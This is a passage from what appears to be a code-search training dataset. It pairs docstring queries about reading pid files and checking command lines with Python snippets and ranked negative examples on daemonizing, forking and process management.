os.close(sys.__stdin__.fileno())\n os.close(sys.__stdout__.fileno())\n os.close(sys.__stderr__.fileno())\n sys.stdin = open('/dev/null', 'r')", "def daemonize(self):\n try:\n pid = os.fork()\n if pid > 0:\n # exit first parent\n sys.exit(0)\n except OSError, e:\n sys.stderr.write(\"fork #1 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # decouple from parent environment\n os.chdir(\"/\")\n os.setsid()\n os.umask(0)\n\n # do second fork\n try:\n pid = os.fork()\n if pid > 0:\n # exit from second parent\n sys.exit(0)\n except OSError, e:\n 
sys.stderr.write(\"fork #2 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # redirect standard file descriptors\n sys.stdout.flush()\n sys.stderr.flush()\n si = file(self.stdin, 'r')\n so = file(self.stdout, 'a+')\n se = file(self.stderr, 'a+', 0)\n os.dup2(si.fileno(), sys.stdin.fileno())\n os.dup2(so.fileno(), sys.stdout.fileno())\n os.dup2(se.fileno(), sys.stderr.fileno())\n\n # write pidfile\n atexit.register(self.delpid)\n pid = str(os.getpid())\n file(self.pidfile,'w+').write(\"%s\\n\" % pid)", "def daemonize(self):\n try:\n pid = os.fork()\n if pid > 0:\n # exit first parent\n sys.exit(0)\n except OSError as e:\n sys.stderr.write(\"fork #1 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # decouple from parent environment\n os.chdir(\"/\")\n os.setsid()\n os.umask(0)\n\n # do second fork\n try:\n pid = os.fork()\n if pid > 0:\n # exit from second parent\n sys.exit(0)\n except OSError as e:\n sys.stderr.write(\"fork #2 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # redirect standard file descriptors\n sys.stdout.flush()\n sys.stderr.flush()\n si = open(self.stdin, 'r')\n so = open(self.stdout, 'a+')\n se = open(self.stderr, 'a+')\n os.dup2(si.fileno(), sys.stdin.fileno())\n os.dup2(so.fileno(), sys.stdout.fileno())\n os.dup2(se.fileno(), sys.stderr.fileno())\n\n # write pidfile\n atexit.register(self.delpid)\n pid = str(os.getpid())\n open(self.pidfile,'w+').write(\"%s\\n\" % pid)", "def daemonize(self):\n try:\n pid = os.fork()\n if pid > 0:\n # exit first parent\n sys.exit(0)\n except OSError as e:\n sys.stderr.write(\"fork #1 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # decouple from parent environment\n os.chdir('/')\n os.setsid()\n os.umask(0)\n\n # do second fork\n try:\n pid = os.fork()\n if pid > 0:\n # exit from second parent\n sys.exit(0)\n except OSError as e:\n sys.stderr.write(\"fork #2 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # redirect standard file descriptors\n sys.stdout.flush()\n sys.stderr.flush()\n si = file(self.stdin, 'r')\n so = file(self.stdout, 'a+')\n se = file(self.stderr, 'a+', 0)\n os.dup2(si.fileno(), sys.stdin.fileno())\n os.dup2(so.fileno(), sys.stdout.fileno())\n os.dup2(se.fileno(), sys.stderr.fileno())\n\n # write pidfile\n atexit.register(self.delpid)\n pid = str(os.getpid())\n file(self.pidfile,'w+').write(\"%s\\n\" % pid)", "def spawn(self):\r\n self.before_spawn()\r\n pid = Subprocess.spawn(self)\r\n if pid is None:\r\n #Remove object reference to decrement the reference count on error\r\n self.fcgi_sock = None\r\n return pid", "def daemonize(self):\n try:\n pid = os.fork()\n if pid > 0:\n # exit first parent\n sys.exit(0)\n except OSError, err:\n sys.stderr.write(\"fork #1 failed: %d (%s)\\n\" %\n (err.errno, err.strerror))\n sys.exit(1)\n\n # decouple from parent environment\n os.chdir(\"/\")\n os.setsid()\n os.umask(0)\n\n # do second fork\n try:\n pid = os.fork()\n if pid > 0:\n # exit from second parent\n sys.exit(0)\n except OSError, err:\n sys.stderr.write(\"fork #2 failed: %d (%s)\\n\" %\n (err.errno, err.strerror))\n sys.exit(1)\n\n # redirect standard file descriptors\n sys.stdout.flush()\n sys.stderr.flush()\n stin = file(self.stdin, 'r')\n stout = file(self.stdout, 'a+')\n sterr = file(self.stderr, 'a+', 0)\n os.dup2(stin.fileno(), sys.stdin.fileno())\n os.dup2(stout.fileno(), sys.stdout.fileno())\n os.dup2(sterr.fileno(), sys.stderr.fileno())\n\n # write pidfile\n atexit.register(self.delpid)\n pid = str(os.getpid())\n file(self.pidfile, 
'w+').write(\"%s\\n\" % pid)", "def fork(self):\n try:\n pid = os.fork()\n if pid > 0:\n sys.exit(0)\n except OSError as e:\n sys.stderr.write(\"Fork failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)", "def daemonize(self):\n\t\ttry: \n\t\t\tpid = os.fork() \n\t\t\tif pid > 0:\n\t\t\t\t# exit first parent\n\t\t\t\tsys.exit(0) \n\t\texcept OSError, e: \n\t\t\tsys.stderr.write(\"fork #1 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n\t\t\tsys.exit(1)\n\t\n\t\t# decouple from parent environment\n\t\tos.chdir(\"/\") \n\t\tos.setsid() \n\t\tos.umask(0) \n\t\n\t\t# do second fork\n\t\ttry: \n\t\t\tpid = os.fork() \n\t\t\tif pid > 0:\n\t\t\t\t# exit from second parent\n\t\t\t\tsys.exit(0) \n\t\texcept OSError, e: \n\t\t\tsys.stderr.write(\"fork #2 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n\t\t\tsys.exit(1) \n\t\n\t\t# redirect standard file descriptors\n\t\tsys.stdout.flush()\n\t\tsys.stderr.flush()\n\t\tsi = file(self.stdin, 'r')\n\t\tso = file(self.stdout, 'a+')\n\t\tse = file(self.stderr, 'a+', 0)\n\t\tos.dup2(si.fileno(), sys.stdin.fileno())\n\t\tos.dup2(so.fileno(), sys.stdout.fileno())\n\t\tos.dup2(se.fileno(), sys.stderr.fileno())\n\t\n\t\t# write pidfile\n\t\tatexit.register(self.delpid)\n\t\tpid = str(os.getpid())\n\t\tfile(self.pidfile,'w+').write(\"%s\\n\" % pid)", "async def fork(pid, cin, state_info):\n do = reporter(state_info, pid)\n\n while True:\n # wait for fork grab\n phil_hand = await do('wg', cin())\n\n # wait for philosopher to pick up fork\n await do('wu', phil_hand())\n\n # wait for philosopher to put down fork\n await do('wd', phil_hand())", "def _forkLifeMain(forkList, addForkQueue):\n needsReplacement = set(forkList)\n\n try:\n def onKillSignal(sig, frame):\n # As the main fork, we do not reap cherrypy's SIGTERM processing.\n # We need to convert SIGTERM into an exception so that we \n # appropriately kill our forks and shutdown.\n raise Exception(\"SIGTERM received\")\n signal.signal(signal.SIGTERM, onKillSignal)\n \n # We don't care about child processes.\n signal.signal(signal.SIGCHLD, signal.SIG_IGN)\n \n while True:\n try:\n oldPid = addForkQueue.get(timeout = 5)\n except Empty:\n # Shouldn't make a new fork, but do check on the ones that\n # are alive.\n pass\n else:\n # Before just starting a new process, make sure this pid is\n # still in our needsReplacement set. If it's not, we've\n # already spawned a replacement child, and spawning another\n # would create too many forks.\n if oldPid in needsReplacement:\n needsReplacement.remove(oldPid)\n pid = os.fork()\n if pid == 0:\n # We're the new child! Hooray! 
Unset our signal\n # handler as cherrypy will install its own.\n signal.signal(signal.SIGTERM, signal.SIG_DFL)\n signal.signal(signal.SIGCHLD, signal.SIG_DFL)\n return\n forkList.append(pid)\n # Add the new pid so it will get replaced\n needsReplacement.add(pid)\n\n # Clean out forkList\n for pid in forkList[:]:\n if not _checkAlive(pid):\n forkList.remove(pid)\n # And restart a new one when one dies\n addForkQueue.put(pid)\n\n except:\n # If there was any error, kill all forks and exit\n _killForks(forkList)\n raise", "def daemonize(pidfile):\n\n try:\n pid = os.fork()\n except OSError as e:\n raise Exception(\"%s [%d]\" % (e.strerror, e.errno))\n\n if (pid == 0): # The first child.\n os.setsid()\n try:\n pid = os.fork() # Fork a second child.\n except OSError as e:\n raise Exception(\"%s [%d]\" % (e.strerror, e.errno))\n\n if (pid == 0): # The second child.\n os.chdir(WORKDIR)\n os.umask(UMASK)\n for i in range(3):\n os.close(i)\n os.open(REDIRECT_TO, os.O_RDWR|os.O_CREAT) # standard input (0)\n os.dup2(0, 1) # standard output (1)\n os.dup2(0, 2) # standard error (2)\n try:\n fp = open(pidfile, 'w')\n fp.write(str(os.getpid()))\n fp.close()\n except:\n pass\n else:\n os._exit(0) # Exit parent (the first child) of the second child.\n else:\n os._exit(0) # Exit parent of the first child.", "def patched_fork(self):\n pid = self.original_os_fork()\n if not pid:\n _LOG('Fork detected. Reinstalling Manhole.')\n self.reinstall()\n return pid", "def daemonize(pidfile):\n\tstdin='/dev/null'\n\tstdout='/dev/null'\n\tstderr='/dev/null'\n\ttry: \n\t\tpid = os.fork() \n\t\tif pid > 0:\n\t\t\t# exit first parent\n\t\t\tsys.exit(0) \n\texcept OSError, e:\n\t\tlogger.critical(\"fork #1 failed: %s\",e) \n\t\tsys.stderr.write(\"fork #1 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n\t\tsys.exit(1)\n\n\t# decouple from parent environment\n\tos.chdir(\"/\") \n\tos.setsid() \n\tos.umask(0) \n\n\t# do second fork\n\ttry: \n\t\tpid = os.fork() \n\t\tif pid > 0:\n\t\t\t# exit from second parent\n\t\t\tsys.exit(0) \n\texcept OSError, e: \n\t\tlogger.critical(\"fork #2 failed: %s\",e) \n\t\tsys.stderr.write(\"fork #2 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n\t\tsys.exit(1) \n\n\t# redirect standard file descriptors\n\tsys.stdout.flush()\n\tsys.stderr.flush()\n\tsi = file(stdin, 'r')\n\tso = file(stdout, 'a+')\n\tse = file(stderr, 'a+', 0)\n\tos.dup2(si.fileno(), sys.stdin.fileno())\n\tos.dup2(so.fileno(), sys.stdout.fileno())\n\tos.dup2(se.fileno(), sys.stderr.fileno())\n\n\t# write pidfile\n\tatexit.register(delpid,pidfile,)\n\tpid = str(os.getpid())\n\tfile(pidfile,'w+').write(\"%s\\n\" % pid)", "def __call__(self, child_func, child_args=[], child_kwds={}):\n if self.__process is not None:\n raise BusyError(\"Another process is already being monitored\")\n self.__exit_code = None\n self.__process = Process(child_func, child_args=child_args, child_kwds=\n child_kwds)\n thrd = self._thrd = threading.Thread(target=self._thrdfunc, daemon=\n self._daemon)\n thrd.start()", "def daemonize(pidfile):\n\n # fork and exit parent process\n try:\n child_pid = os.fork()\n if child_pid > 0:\n # parent can exit\n sys.exit(0)\n elif child_pid == 0:\n # child does nothing\n pass\n else:\n logging.error(\"Aborting. Failed to fork: %s\" % e.strerror)\n sys.exit(1);\n except OSError, e:\n logging.error(\"Aborting. 
Failed to fork: %s\" % e.strerror)\n sys.exit(1)\n\n # get rid of any outside influence\n os.setsid()\n\n # fork again to prevent zombies\n try:\n child_pid = os.fork()\n if child_pid > 0:\n # parent can exit\n sys.exit(0)\n elif child_pid == 0:\n # child creates PIDFILE\n logging.info(\"Fork successful. PID is %d\" % os.getpid())\n if pidfile:\n pidfileh = open(pidfile, 'w')\n pidfileh.write('%d\\n' % os.getpid())\n pidfileh.close()\n atexit.register(os.remove, pidfile)\n else:\n logging.error(\"Aborting. Failed to fork: %s\" % e.strerror)\n sys.exit(1);\n\n except OSError, e:\n logging.error(\"Aborting. Failed to fork: %s\" % e.strerror)\n sys.exit(1)", "def spawn(self):\r\n options = self.config.options\r\n\r\n if self.pid:\r\n msg = 'process %r already running' % self.config.name\r\n options.logger.warn(msg)\r\n return\r\n\r\n self.killing = 0\r\n self.spawnerr = None\r\n self.exitstatus = None\r\n self.system_stop = 0\r\n self.administrative_stop = 0\r\n\r\n self.laststart = time.time()\r\n\r\n self._assertInState(ProcessStates.EXITED, ProcessStates.FATAL,\r\n ProcessStates.BACKOFF, ProcessStates.STOPPED)\r\n\r\n self.change_state(ProcessStates.STARTING)\r\n\r\n try:\r\n filename, argv = self.get_execv_args()\r\n except ProcessException as what:\r\n self.record_spawnerr(what.args[0])\r\n self._assertInState(ProcessStates.STARTING)\r\n self.change_state(ProcessStates.BACKOFF)\r\n return\r\n\r\n try:\r\n self.dispatchers, self.pipes = self.config.make_dispatchers(self)\r\n except OSError as why:\r\n code = why.args[0]\r\n if code == errno.EMFILE:\r\n # too many file descriptors open\r\n msg = 'too many open files to spawn %r' % self.config.name\r\n else:\r\n msg = 'unknown error: %s' % errno.errorcode.get(code, code)\r\n self.record_spawnerr(msg)\r\n self._assertInState(ProcessStates.STARTING)\r\n self.change_state(ProcessStates.BACKOFF)\r\n return\r\n\r\n try:\r\n pid = options.fork()\r\n except OSError as why:\r\n code = why.args[0]\r\n if code == errno.EAGAIN:\r\n # process table full\r\n msg = ('Too many processes in process table to spawn %r' %\r\n self.config.name)\r\n else:\r\n msg = 'unknown error: %s' % errno.errorcode.get(code, code)\r\n\r\n self.record_spawnerr(msg)\r\n self._assertInState(ProcessStates.STARTING)\r\n self.change_state(ProcessStates.BACKOFF)\r\n options.close_parent_pipes(self.pipes)\r\n options.close_child_pipes(self.pipes)\r\n return\r\n\r\n if pid != 0:\r\n return self._spawn_as_parent(pid)\r\n\r\n else:\r\n return self._spawn_as_child(filename, argv)", "def daemonize(self):\n try:\n pid = os.fork()\n if pid > 0:\n # exit first parent\n sys.exit(0)\n except OSError, e:\n sys.stderr.write(\"fork #1 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # decouple from parent environment\n # os.chdir(\"/\")\n os.setsid()\n os.umask(0)\n\n # do second fork\n try:\n pid = os.fork()\n if pid > 0:\n # exit from second parent\n sys.exit(0)\n except OSError, e:\n sys.stderr.write(\"fork #2 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # redirect standard file descriptors\n logging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s:%(levelname)s:%(name)s:%(message)s',\n filename=self.logname,\n filemode='a'\n )\n\n stdout_logger = logging.getLogger('STDOUT')\n sl = StreamToLogger(stdout_logger, logging.INFO)\n sys.stdout = sl\n\n stderr_logger = logging.getLogger('STDERR')\n sl = StreamToLogger(stderr_logger, logging.ERROR)\n sys.stderr = sl\n\n # write pidfile\n atexit.register(self.delpid)\n pid = str(os.getpid())\n 
file(self.pidfile,'w+').write(\"%s\\n\" % pid)", "def __daemonize(self):\n\n pid = os.fork()\n if not pid > 0:\n cpid = os.fork()\n\n if cpid > 0:\n sys.exit(0)\n\n os.setsid();\n (nr_of_fds,ignore) = resource.getrlimit(RLIMIT_NOFILE)\n\n for i in range(0,nr_of_fds):\n try:\n os.close(i)\n except OSError:\n pass\n else:\n sys.exit(0)", "def daemonize(self):\n pid = os.fork()\n if pid != 0:\n LOG.debug(\"taskmasterd forked; parent exiting\")\n os._exit(0)\n LOG.info(\"daemonizing the taskmasterd process\")\n try:\n os.chdir(self.directory)\n except OSError as err:\n LOG.critical(\"can't chdir into %r: %s\" % (self.directory, err))\n else:\n LOG.debug(\"set current directory: %r\" % self.directory)\n os.close(0)\n self.stdin = sys.stdin = sys.__stdin__ = open(\"/dev/null\")\n os.close(1)\n self.stdout = sys.stdout = sys.__stdout__ = open(\"/dev/null\", \"w\")\n os.close(2)\n self.stderr = sys.stderr = sys.__stderr__ = open(\"/dev/null\", \"w\")\n os.setsid()\n os.umask(self.umask)", "def start(self):\n self._proc = self._get_subprocess()\n self._pid = self._proc.pid\n self._return_code = None", "def __init__(self):\n self.child = os.fork()\n if self.child == 0:\n return\n else:\n self.watch()", "def launch(self):\n self._fork()\n self._lock()\n os.setegid(self._user[1])\n os.seteuid(self._user[0])\n self._loop = True\n signal.signal(signal.SIGTERM, self.__signalHandler)\n sys.stdout = self._output\n sys.stderr = self._error\n self._run()\n sys.stdout = self._stdout\n sys.stderr = self._stderr\n os.setegid(0)\n os.seteuid(0)\n self._unlock()", "def daemonize(pidfile=\"\"):\n \n if (pidfile):\n if os.path.exists(pidfile):\n sys.exit(\"The pidfile \" + pidfile + \" already exists, Trakt for VLC may still be running.\")\n try:\n file(pidfile, 'w').write(\"pid\\n\")\n except IOError, e:\n sys.exit(\"Unable to write PID file: %s [%d]\" % (e.strerror, e.errno))\n \n # Make a non-session-leader child process\n try:\n pid = os.fork() #@UndefinedVariable - only available in UNIX\n if pid != 0:\n sys.exit(0)\n except OSError, e:\n raise RuntimeError(\"1st fork failed: %s [%d]\" %\n (e.strerror, e.errno))\n\n os.setsid() #@UndefinedVariable - only available in UNIX\n\n # Make sure I can read my own files and shut out others\n prev = os.umask(0)\n os.umask(prev and int('077', 8))\n\n # Make the child a session-leader by detaching from the terminal\n try:\n pid = os.fork() #@UndefinedVariable - only available in UNIX\n if pid != 0:\n sys.exit(0)\n except OSError, e:\n raise RuntimeError(\"2nd fork failed: %s [%d]\" %\n (e.strerror, e.errno))\n\n dev_null = file('/dev/null', 'r')\n os.dup2(dev_null.fileno(), sys.stdin.fileno())\n \n if (pidfile):\n file(pidfile, \"w\").write(\"%s\\n\" % str(os.getpid()))", "def spawn(cmd, cwd=None):\n\t# FROM: http://stackoverflow.com/questions/972362/spawning-process-from-python\n\t# fork the first time (to make a non-session-leader child process)\n\ttry:\n\t\tpid = os.fork()\n\texcept OSError as e:\n\t\traise RuntimeError(\"1st fork failed: %s [%d]\" % (e.strerror, e.errno))\n\tif pid != 0:\n\t\t# parent (calling) process is all done\n\t\treturn pid\n\t# detach from controlling terminal (to make child a session-leader)\n\tos.setsid()\n\ttry:\n\t\tpid = os.fork()\n\texcept OSError as e:\n\t\traise RuntimeError(\"2nd fork failed: %s [%d]\" % (e.strerror, e.errno))\n\tif pid != 0:\n\t\t# child process is all done\n\t\tos._exit(0)\n\t# grandchild process now non-session-leader, detached from parent\n\t# grandchild process must now close all open files\n\ttry:\n\t\tmaxfd = 
os.sysconf(\"SC_OPEN_MAX\")\n\texcept (AttributeError, ValueError):\n\t\tmaxfd = 1024\n\tfor fd in range(maxfd):\n\t\ttry:\n\t\t\tos.close(fd)\n\t\texcept OSError: # ERROR, fd wasn't open to begin with (ignored)\n\t\t\tpass\n\t# redirect stdin, stdout and stderr to /dev/null\n\tif (hasattr(os, \"devnull\")):\n\t\tREDIRECT_TO = os.devnull\n\telse:\n\t\tREDIRECT_TO = \"/dev/null\"\n\tos.open(REDIRECT_TO, os.O_RDWR) # standard input (0)\n\tos.dup2(0, 1)\n\tos.dup2(0, 2)\n\t# and finally let's execute the executable for the daemon!\n\ttry:\n\t\targs = filter(lambda _:_, map(lambda _:_.strip(), cmd.split(\" \")))\n\t\tpath_to_executable = args[0]\n\t\targs = args[1:]\n\t\tos.execv(path_to_executable, args)\n\texcept Exception as e:\n\t\t# oops, we're cut off from the world, let's just give up\n\t\tos._exit(255)", "def onPreFork(self):" ]
[ "0.6289691", "0.6277763", "0.6235509", "0.6211188", "0.61053115", "0.59950376", "0.59734493", "0.5932291", "0.5924541", "0.59134763", "0.5890534", "0.5890318", "0.58181685", "0.5802295", "0.57700944", "0.57442904", "0.5697643", "0.56894493", "0.56711257", "0.5625068", "0.56202984", "0.56094694", "0.5603913", "0.5539175", "0.5469471", "0.546444", "0.545406", "0.5423536", "0.5372618", "0.5291311" ]
0.6278399
1
Reads the pid file and returns the process id contained in it. This also verifies, as best as it can, that the returned process is running and is really an agent process. Returns the id of the agent process, or None if there is none or it cannot be read.
def __read_pidfile(self): try: pf = file(self.pidfile, 'r') contents = pf.read().strip().split() pf.close() except IOError: return None pid = int(contents[0]) try: os.kill(pid, 0) except OSError, e: # ESRCH indicates the process is not running, in which case we ignore the pidfile. if e.errno == errno.ESRCH: return None # EPERM indicates the current user does not have permission to signal the process.. so it exists # but may not be the agent process. We will just try our /proc/pid/commandline trick below if we can. elif e.errno != errno.EPERM: raise e # If we got here, the process is running, and we have to see if we can determine if it is really the # original agent process. For Linux systems with /proc, we see if the commandlines match up. # For all other Posix systems, (Mac OS X, etc) we bail for now. if not self.__can_read_command_line(pid): return pid # Handle the case that we have an old pid file that didn't have the commandline right into it. if len(contents) == 1: return pid command_line = self.__read_command_line(pid) if contents[1] == command_line: return pid else: return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getPid(self):\n try:\n fh = open(self.filename)\n except OSError:\n return None\n line = fh.readline()\n try:\n return string.atoi(line) # trailing newline doesn't matter\n except ValueError:\n return None", "def get_pid(self):\n\t\ttry:\n\t\t\tpid_file = open(self.pid_file_path, 'r');\n\t\t\tpid = int(pid_file.read().strip())\n\t\t\tpid_file.close()\n\t\texcept:\n\t\t\tpid = -1;\n\t\treturn pid", "def get_pid(self):\n try:\n pf = open(self.pidfile,'r')\n pid = int(pf.read().strip())\n pf.close()\n except (IOError, TypeError):\n pid = None\n return pid", "def get_pid(self):\n if self.status():\n file = open(os.path.join(self.data_dir, 'postmaster.pid'))\n pid = int(file.readline())\n return pid\n else:\n return None", "def read_pid(self):\n result = read_pid_from_pidfile(self.path)\n return result", "def status(pid_file):\n if not os.path.exists(pid_file):\n return None\n\n pid = None\n with open(pid_file, \"r\") as pf:\n pid = pf.read().strip()\n\n if not pid:\n logger.error(\"Unable to retrieve pid from %s\" % pid_file)\n return None\n\n if not pid.isdigit():\n logger.error(\"Invalid pid %s read from %s\" % (pid, pid_file))\n return None\n\n pid = int(pid)\n\n try:\n # Send 0 signal to check if the process is alive.\n os.kill(pid, 0)\n except OSError as e:\n logger.debug(\"%s\" % e, exc_info=True)\n return None\n return pid", "def get_pid(self, file_path) -> int | None:\n if file_path in self._processors:\n return self._processors[file_path].pid\n return None", "def get_pidfile(self):\n pid = None\n \n # checking if the file exists on system\n if not os.path.exists(self._pidfile):\n return pid\n \n # read the pid\n with open(self._pidfile, 'r') as f:\n pid = int(f.read().strip())\n\n return pid", "def read_pid_from_pidfile(pidfile_path):\n pid = None\n try:\n pidfile = open(pidfile_path, 'r')\n except IOError:\n pass\n else:\n line = pidfile.read().strip()\n try:\n pid = int(line)\n except ValueError:\n pass\n pidfile.close()\n\n return pid", "def get_pid(pidfile):\n pid = None\n if os.path.exists(pidfile):\n with open(pidfile, 'r') as f:\n pid = f.read()\n return pid", "def get_ts_pid(pidfile):\n try:\n with open(pidfile) as f:\n pid = f.readline()\n if pid.strip().isdigit():\n pid = int(pid.strip())\n else:\n LOG.warning(\"Unable to read pidfile %s file contains %r; process metrics will fail!\", pidfile, pid)\n pid = None\n except EnvironmentError:\n LOG.warning(\"Unable to read pidfile %s; process metrics will fail!\", pidfile)\n pid = None\n return pid", "def pid(self) -> str:\n if not self.pid_path.exists():\n return None\n try:\n with open(self.pid_path, 'r') as f:\n text = f.read()\n except Exception as e:\n warn(e)\n text = None\n return text.rstrip('\\n') if text is not None else text", "def pidof(processname = None):\n processname = os.path.basename(processname)\n pidpath = os.path.join(pid_path,processname + \".pid\")\n if processname is not None and os.path.exists(pidpath):\n f = open (pidpath)\n pids = f.readlines()\n f.close()\n return pids\n else:\n return False", "def _get_pid(self):\n ps_txt = six.ensure_str(self.controller.run(\n args=[\"ps\", \"ww\", \"-u\"+str(os.getuid())]\n ).stdout.getvalue()).strip()\n lines = ps_txt.split(\"\\n\")[1:]\n\n for line in lines:\n if line.find(\"ceph-{0} -i {1}\".format(self.daemon_type, self.daemon_id)) != -1:\n log.info(\"Found ps line for daemon: {0}\".format(line))\n return int(line.split()[0])\n log.info(\"No match for {0} {1}: {2}\".format(\n self.daemon_type, self.daemon_id, ps_txt\n ))\n return None", "def pid(self):\n 
# type: () -> Optional[int]\n try:\n return self._process.pid # type: ignore # pylint: disable=no-member\n except:\n return None", "def get_process_pid(robot_name):\n\n try:\n result = check_output(['pgrep', 'x{0}'.format(robot_name)])\n return int(result.strip())\n except:\n return None", "def pid(self):\n return self._process.pid", "def getStepPID(stepSpace, stepName):\n currDir = stepSpace.location\n pidFile = os.path.join(currDir, 'process_id')\n if not os.path.isfile(pidFile):\n msg = \"Could not find process ID file for step %s\" % stepName\n logging.error(msg)\n return\n\n with open(pidFile, 'r') as filehandle:\n output = filehandle.read()\n\n try:\n stepPID = int(output)\n except ValueError:\n msg = \"Couldn't find a number\"\n logging.error(msg)\n return None\n\n return stepPID", "def pid(self):\n return self._get_process_id()", "def get_pid(name):\n try: \n for process in psutil.process_iter():\n try:\n proc = process.as_dict(attrs=['pid', 'name'])\n if name in proc['name']:\n pid = proc['pid']\n logging.info(f\"Found PID {pid} for {name}\")\n return int(pid) \n except (psutil.NoSuchProcess, psutil.AccessDenied , psutil.ZombieProcess) :\n pass \n except Exception as e:\n logging.exception(f\"EXCEPTION: {e} \\n Full stack trace: \\n\", exc_info=1)", "def pid(self):\n\n return getpid() if self.__process is None else self.__process.pid", "def getPID(self):\r\n self._update('getPID')\r\n return self.supervisord.options.get_pid()", "def pid(self):\n if self.proc is None:\n return 0\n return self._pid()", "def _get_pid(split_data, sensor):\n prot, ip_dst, port_dst, timestamp = split_data\n prot = prot.lower()\n\n if not sanitizer.check_get_pid_params(prot, ip_dst, port_dst, timestamp):\n return '-1,error checking input'\n\n return sensor.search_process(prot, ip_dst, port_dst, timestamp)", "def get_daemon_pid():\n try:\n return _get_pid_from_pidfile()\n except (FileNotFoundError, ValueError):\n return None", "def pid(self):\n return self._query_status()['pid']", "def get_pid(name, path=None):\n if name not in list_(limit=\"running\", path=path):\n raise CommandExecutionError(\n f\"Container {name} is not running, can't determine PID\"\n )\n info = __salt__[\"cmd.run\"](f\"lxc-info -n {name}\").split(\"\\n\")\n pid = [\n line.split(\":\")[1].strip()\n for line in info\n if re.match(r\"\\s*PID\", line) is not None\n ][0]\n return pid", "def GetChromePid(self):\n result = self.GetChromeProcess()\n if result and 'pid' in result:\n return result['pid']\n return None", "def pid(self):\n return self._pid", "def pid(self):\n return self._pid" ]
[ "0.7579522", "0.74366933", "0.7350737", "0.72607666", "0.707823", "0.6928475", "0.68607014", "0.6809271", "0.68042326", "0.67258936", "0.6717959", "0.6676065", "0.6591127", "0.64635587", "0.64168656", "0.63849145", "0.63500375", "0.6348595", "0.62905115", "0.6233244", "0.623055", "0.61107063", "0.6055809", "0.60377795", "0.60055953", "0.5990423", "0.5931218", "0.5907016", "0.59000325", "0.59000325" ]
0.79762614
0
Returns True if the commandline arguments for the specified process can be read.
def __can_read_command_line(self, pid): return os.path.isfile('/proc/%d/cmdline' % pid)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def depends_on_process(self, process):\n for output_resource in process.iter_outputs():\n if self.has_input(output_resource):\n return True\n return False", "def check_arguments(self):\n self.check_num_arguments()\n self.are_readable_files(self.args)", "def check_args(self):\n parser = get_base_arguments(get_parser())\n parser = get_tc_arguments(parser)\n # Disable \"Do not use len(SEQ) as condition value\"\n # pylint: disable=C1801\n if len(sys.argv) < 2:\n self.logger.error(\"Icetea called with no arguments! \")\n parser.print_help()\n return False\n elif not self.args.ignore_invalid_params and self.unknown:\n self.logger.error(\"Unknown parameters received, exiting. \"\n \"To ignore this add --ignore_invalid_params flag.\")\n self.logger.error(\"Following parameters were unknown: {}\".format(self.unknown))\n parser.print_help()\n return False\n return True", "def is_command_ancillary(args):\n # pylint: disable=bad-continuation\n if (\n # skip the parent check and only\n # determine if the parameter is present\n is_valid_executes(args, skip=True)\n ):\n return True\n return False", "def parameters_are_valid():\n # The only accepted number of command line arguments is 3: they are\n # aggregator.py, the filename, and the topic\n if len(sys.argv) != 3:\n # Issue error message if invalid number of command line arguments\n print(\"Error: invalid number of arguments\")\n print(\"Usage: aggregator.py filename topic\")\n return False\n else:\n return True", "def hasCommand():\n args = sys.argv[1:]\n if '--help' in args:\n return False\n if '-h' in args:\n return False\n for arg in args:\n if arg and not arg.startswith('-'):\n return True\n return False", "def check_command(self):\n return self.process is not None and self.process.poll() is None", "def validate_args() -> bool:\n if len(argv) == 1 or \\\n '--help' in argv:\n print(usage)\n return False\n return True", "def validate_args(args):\n command = args[0]\n args_length = len(args) - 1\n return VALID_COMMANDS[command] == args_length", "def validate_argv(argv):\n if len(argv) != 1:\n return False\n return True", "def is_available(self):\n try :\n p = subprocess.Popen([self.program_path, self.help_argument],stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p.communicate()\n return p.wait() == self.help_return_code\n except OSError:\n return False", "def validate_input(self):\n if (self.options.mexURL and self.options.token): #run module through engine service\n return True\n\n if (self.options.user and self.options.pwd and self.options.root): #run module locally (note: to test module)\n return True\n\n log.debug('Dream3D: Insufficient options or arguments to start this module')\n return False", "def check_args():\n schema = Schema({\n 'FOLDREC': Use(open, error='FOLDREC file should be readable'),\n 'CLUSTAL': Use(open, error='CLUSTAL file should be readable'),\n 'CCMPRED': Use(open, error='CCMPRED file should be readable'),\n '--metafold': Use(open, error='METAFOLD_FILE should be readable'),\n '--nb_pdb': And(Use(int), lambda n: 1 <= n <= 405,\n error='--nb_pdb=NUM should be integer 1 <= N <= 405'),\n '--dssp': Use(open, error='dssp/mkdssp should be readable'),\n '--dope': Use(open, error='dope file should be readable'),\n '--benchmark': Use(open, error='BENCHMARK_FILE should be readable'),\n '--cpu': And(Use(int), lambda n: 0 <= n <= cpu_count(),\n error='--cpus=NUM should be integer 1 <= N <= ' + str(cpu_count())),\n # The output PATH is created (if not exists) at the end of the program\n # so we skip the check.\n object: object})\n 
